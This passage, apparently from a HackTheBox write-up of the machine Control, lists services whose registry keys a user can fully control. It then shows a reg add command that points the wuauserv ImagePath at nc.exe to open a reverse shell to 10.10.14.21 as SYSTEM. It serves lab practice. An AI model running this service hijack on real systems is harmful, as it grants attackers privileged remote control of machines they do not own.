PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_4248c
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_4afaf
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_80d08
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : CDPUserSvc_ee306
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
                          BUILTIN\Users Allow  -1610612736
                          BUILTIN\Users Allow  ReadKey
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
                          BUILTIN\Users Allow  -1610612736
                          BUILTIN\Users Allow  ReadKey
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_4248c
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_4afaf
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_80d08
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName             : WpnUserService_ee306
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl
PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
                          NT AUTHORITY\Authenticated Users Allow  ReadKey
                          CONTROL\Hector Allow  FullControl

Abusing Services

I have a list of services Hector can run with full control. The service “wuauserv” is what I should use as per the hint I received in HTB Forum.

Windows WUAUServ is a system service of the Windows Update feature. It runs only when Windows Update is running. This service runs for a couple of minutes and verifies if there is a Windows Update is going on or no if the service is not running it stops itself.

*Evil-WinRM* PS C:\Users\Hector\Documents> Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv


DependOnService     : {rpcss}
Description         : @%systemroot%\system32\wuaueng.dll,-106
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl        : 1
FailureActions      : {128, 81, 1, 0...}
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry


If you remember the retired machine Helpline, I exploit the windows print spool service to run my nc.exe. I’m going to use the same practice to exploit this machine.

*Evil-WinRM* PS C:\Users\Hector\Documents> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.21 4444 -e cmd" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.21 4444 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Hector\Documents> 

Start Listening:

Start Service

*Evil-WinRM* PS C:\Users\Hector\Documents> 
*Evil-WinRM* PS C:\Users\Hector\Documents> Start-Service wuauserv
Start-Service wuauserv

Reverse Shell As Administrator

Root.txt

Thank you for reading, hope you enjoyed.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
4 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback
9 months ago

[…] November 6, 2019November 17, 2019 […]

duckie
duckie
8 months ago

hey, mate

i also found service through hackthebox forum hint, any idea how the vuln service what originally meant to be found, i mean without any hint ?

i tried brute force on all the available services but fhat didn’t work

Hamed
Hamed
4 months ago

Hey dude,
Thank you for your nice and useful writeups.

Two points you may not know:

1- You don’t need WhiteWinterWolf to upload plink.exe. You can use sqlmap to upload it the same way you uploaded your php shell.

2- You couldn’t ssh back to your box as root because it is disabled by default in the /etc/ssh/sshd_config

Sorry, that action is blocked.